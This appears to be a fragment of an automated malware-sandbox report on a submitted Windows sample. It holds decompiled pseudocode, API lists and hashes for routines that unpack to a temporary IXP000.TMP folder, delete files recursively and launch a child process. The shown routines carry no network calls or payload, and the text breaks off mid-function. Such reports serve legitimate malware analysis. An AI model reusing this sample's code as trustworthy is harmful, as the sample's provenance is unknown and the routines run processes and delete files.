                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t10;
                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                          				intOrPtr _t14;
                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                          				void* _t28;
                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                          				CHAR* _t48;
                                                                                                                                                                                                          				signed int _t49;
                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t10 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				if(__edx == 0) {
                                                                                                                                                                                                          					_t48 = 0x8691e4;
                                                                                                                                                                                                          					_t42 = 0x104;
                                                                                                                                                                                                          					E00861680(0x8691e4, 0x104);
                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                          					_t13 = E008658C8(_t48); // executed
                                                                                                                                                                                                          					if(_t13 != 0) {
                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                          						_t42 = _a4;
                                                                                                                                                                                                          						if(_a4 == 0) {
                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                          							 *0x869124 = 0;
                                                                                                                                                                                                          							_t14 = 1;
                                                                                                                                                                                                          							L24:
                                                                                                                                                                                                          							return E00866CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t16 = E0086597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t61 =  *0x868a20; // 0x0
                                                                                                                                                                                                          						if(_t61 != 0) {
                                                                                                                                                                                                          							 *0x868a20 = 0;
                                                                                                                                                                                                          							RemoveDirectoryA(_t48);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                          						_t14 = 0;
                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                          						 *0x869124 = E00866285();
                                                                                                                                                                                                          						goto L22;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x868a20 = 1;
                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t42 =  &_v268;
                                                                                                                                                                                                          				_t20 = E008653A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                          				_t48 = 0x8691e4;
                                                                                                                                                                                                          				E00861781(0x8691e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                          				if(( *0x869a34 & 0x00000020) == 0) {
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_t42 = 0x104;
                                                                                                                                                                                                          					E0086658A(_t48, 0x104, 0x861140);
                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				GetSystemInfo( &_v304);
                                                                                                                                                                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                          					_push("i386");
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					E0086658A(_t48, 0x104);
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t28 = _t26 - 1;
                                                                                                                                                                                                          				if(_t28 == 0) {
                                                                                                                                                                                                          					_push("mips");
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t29 = _t28 - 1;
                                                                                                                                                                                                          				if(_t29 == 0) {
                                                                                                                                                                                                          					_push("alpha");
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t29 != 1) {
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push("ppc");
                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                          			}





















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008654C9
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086553D
                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086556F
                                                                                                                                                                                                            • Part of subcall function 008653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008653FB
                                                                                                                                                                                                            • Part of subcall function 008653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865402
                                                                                                                                                                                                            • Part of subcall function 008653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086541F
                                                                                                                                                                                                            • Part of subcall function 008653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0086542B
                                                                                                                                                                                                            • Part of subcall function 008653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00865434
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                          • API String ID: 1979080616-186922987
                                                                                                                                                                                                          • Opcode ID: 90070ef3572397b9f9d8378a28630c7a4ae197b7744793599cdfa16442879d32
                                                                                                                                                                                                          • Instruction ID: e52b53da727da92cb69858cb8bc5f231d02fa13fd256f7d8fd3763c870cff7fd
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90070ef3572397b9f9d8378a28630c7a4ae197b7744793599cdfa16442879d32
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0313570B00A249BCF109B699C4D97E779AFB81300F1B012AE817D7781EFB48E018B96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E00862390(CHAR* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                          				char _v284;
                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                          				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				void* _t63;
                                                                                                                                                                                                          				CHAR* _t65;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                          				_t21 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                          				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                          				_t65 = __ecx;
                                                                                                                                                                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_pop(_t62);
                                                                                                                                                                                                          					_pop(_t66);
                                                                                                                                                                                                          					_pop(_t46);
                                                                                                                                                                                                          					return E00866CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					E00861680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                          					_t58 = 0x104;
                                                                                                                                                                                                          					E008616B3( &_v280, 0x104, "*");
                                                                                                                                                                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                          					_t63 = _t22;
                                                                                                                                                                                                          					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						goto L3;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					do {
                                                                                                                                                                                                          						L3:
                                                                                                                                                                                                          						_t58 = 0x104;
                                                                                                                                                                                                          						E00861680( &_v276, 0x104, _t65);
                                                                                                                                                                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                          							_t58 = 0x104;
                                                                                                                                                                                                          							E008616B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                          							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                          							DeleteFileA( &_v280);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                          								E008616B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                          								_t58 = 0x104;
                                                                                                                                                                                                          								E0086658A( &_v280, 0x104, 0x861140);
                                                                                                                                                                                                          								E00862390( &_v284);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                          					} while (_t36 != 0);
                                                                                                                                                                                                          					FindClose(_t63); // executed
                                                                                                                                                                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                          					goto L10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}


                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileA.KERNELBASE(?,00868A3A,008611F4,00868A3A,00000000,?,?), ref: 008623F6
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,008611F8), ref: 00862427
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,008611FC), ref: 0086243B
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00862495
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 008624A3
                                                                                                                                                                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 008624AF
                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 008624BE
                                                                                                                                                                                                          • RemoveDirectoryA.KERNELBASE(00868A3A), ref: 008624C5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 836429354-0
                                                                                                                                                                                                          • Opcode ID: e5834c1847340784075cd5d0a81e9dd4efed372dfb98de6ab7c699b4ebcafc2f
                                                                                                                                                                                                          • Instruction ID: a36fe9eb0f414d22bd47348f94fd00ed7022d7299d3f567f5f449224c1f39ff2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5834c1847340784075cd5d0a81e9dd4efed372dfb98de6ab7c699b4ebcafc2f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64319031604A40ABC720EB68CC8DAEB73ECFBC5305F0A492DF556D6291EF7499098B57
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 631 863fef-864010 632 864016-86403b CreateProcessA 631->632 633 86410a-86411a call 866ce0 631->633 634 8640c4-864101 call 866285 GetLastError FormatMessageA call 8644b9 632->634 635 864041-86406e WaitForSingleObject GetExitCodeProcess 632->635 647 864106 634->647 637 864070-864077 635->637 638 864091 call 86411b 635->638 637->638 641 864079-86407b 637->641 646 864096-8640b8 CloseHandle * 2 638->646 641->638 645 86407d-864089 641->645 645->638 648 86408b 645->648 649 8640ba-8640c0 646->649 650 864108 646->650 647->650 648->638 649->650 651 8640c2 649->651 650->633 651->647
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E00863FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                          				long _v528;
                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t20;
                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                          				int _t25;
                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                          				signed int _t44;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				intOrPtr _t53;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t45 = __edx;
                                                                                                                                                                                                          				_t20 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                          				_t39 = __ecx;
                                                                                                                                                                                                          				_t49 = 1;
                                                                                                                                                                                                          				_t22 = 0;
                                                                                                                                                                                                          				if(__ecx == 0) {
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					return E00866CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				asm("stosd");
                                                                                                                                                                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                          				if(_t25 == 0) {
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                          					_t45 = 0x4c4;
                                                                                                                                                                                                          					E008644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					_t49 = 0;
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					_t22 = _t49;
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                          				_t44 = _v528;
                                                                                                                                                                                                          				_t53 =  *0x868a28; // 0x0
                                                                                                                                                                                                          				if(_t53 == 0) {
                                                                                                                                                                                                          					_t34 =  *0x869a2c; // 0x0
                                                                                                                                                                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                          						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                          							 *0x869a2c = _t44;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E0086411B(_t34, _t44);
                                                                                                                                                                                                          				CloseHandle(_v544.hThread);
                                                                                                                                                                                                          				CloseHandle(_v544);
                                                                                                                                                                                                          				if(( *0x869a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessA.KERNELBASE ref: 00864033
                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00864049
                                                                                                                                                                                                          • GetExitCodeProcess.KERNELBASE ref: 0086405C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0086409C
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 008640A8
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 008640DC
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 008640E9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3183975587-0
                                                                                                                                                                                                          • Opcode ID: 69e688931265a5654ff799d7fdc46d462de29c1563c48609909b0a24a4b86c5c
                                                                                                                                                                                                          • Instruction ID: 6c3b1c3d623bdcad5f7cdaf121c0ee33dd30baff9124f735c2fa0a8b44725d36
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69e688931265a5654ff799d7fdc46d462de29c1563c48609909b0a24a4b86c5c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7631D131640618BBEB209F65DC49FAB77BCFB95700F1221A9F645E21A1CA708C85CF62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 70%
                                                                                                                                                                                                          			E00862BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				intOrPtr _t7;
                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                          				struct HINSTANCE__* _t12;
                                                                                                                                                                                                          				intOrPtr* _t17;
                                                                                                                                                                                                          				signed char _t19;
                                                                                                                                                                                                          				intOrPtr* _t21;
                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t4 = GetVersion();
                                                                                                                                                                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                          						if(_t21 != 0) {
                                                                                                                                                                                                          							_t17 = _t21;
                                                                                                                                                                                                          							 *0x86a288(0, 1, 0, 0);
                                                                                                                                                                                                          							 *_t21();
                                                                                                                                                                                                          							_t29 = _t24 - _t24;
                                                                                                                                                                                                          							if(_t24 != _t24) {
                                                                                                                                                                                                          								_t17 = 4;
                                                                                                                                                                                                          								asm("int 0x29");
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t20 = _a12;
                                                                                                                                                                                                          				_t18 = _a4;
                                                                                                                                                                                                          				 *0x869124 = 0;
                                                                                                                                                                                                          				if(E00862CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                          					_t9 = E00862F1D(_t18, _t20); // executed
                                                                                                                                                                                                          					_t22 = _t9; // executed
                                                                                                                                                                                                          					E008652B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                          					if(_t22 != 0) {
                                                                                                                                                                                                          						_t32 =  *0x868a3a; // 0x0
                                                                                                                                                                                                          						if(_t32 == 0) {
                                                                                                                                                                                                          							_t19 =  *0x869a2c; // 0x0
                                                                                                                                                                                                          							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                          								E00861F90(_t19, _t21, _t22);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t6 =  *0x868588; // 0x0
                                                                                                                                                                                                          				if(_t6 != 0) {
                                                                                                                                                                                                          					CloseHandle(_t6);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t7 =  *0x869124; // 0x0
                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C03
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C18
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00862C28
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00866BB0,00860000,00000000,00000002,0000000A), ref: 00862C98
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                          • API String ID: 62482547-3460614246
                                                                                                                                                                                                          • Opcode ID: 7e7f4d95430bdf2185f1b536f109d2346339bbfc7b3e2f046f9ea4fac139b5c3
                                                                                                                                                                                                          • Instruction ID: e3a1492fa0eaab6bfc616f23b08b79a831d9ccae0b1aaac87a0c42a28867d698
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e7f4d95430bdf2185f1b536f109d2346339bbfc7b3e2f046f9ea4fac139b5c3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D114C31200B059BCB206BB8AC99A2F375DFB84384B0B1055F845F7391DE78DC41CA62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00866F40() {
                                                                                                                                                                                                          
                                                                                                                                                                                                          				SetUnhandledExceptionFilter(E00866EF0); // executed
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}



                                                                                                                                                                                                          0x00866f45
                                                                                                                                                                                                          0x00866f4d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00866F45
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                          • Opcode ID: b191f09cacc32c5fae8b0363f72893a3fafe906a1321ea123125afbeb36ed331
                                                                                                                                                                                                          • Instruction ID: fc79ec63ec572cc47eeb60fe566efb5a2c2bd00371c1f15e479d0042eda46e55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b191f09cacc32c5fae8b0363f72893a3fafe906a1321ea123125afbeb36ed331
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA9002642511804797141B70DD194157591BA4E602B936460E122D4594EBB590505952
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                          			E0086202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                          				int _v536;
                                                                                                                                                                                                          				int _v540;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          				long _t36;
                                                                                                                                                                                                          				long _t41;
                                                                                                                                                                                                          				struct HINSTANCE__* _t46;
                                                                                                                                                                                                          				intOrPtr _t49;
                                                                                                                                                                                                          				intOrPtr _t50;
                                                                                                                                                                                                          				CHAR* _t54;
                                                                                                                                                                                                          				void _t56;
                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                          				intOrPtr* _t72;
                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                          				intOrPtr* _t81;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                          				void* _t90;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                          				void* _t94;
                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t79 = __edx;
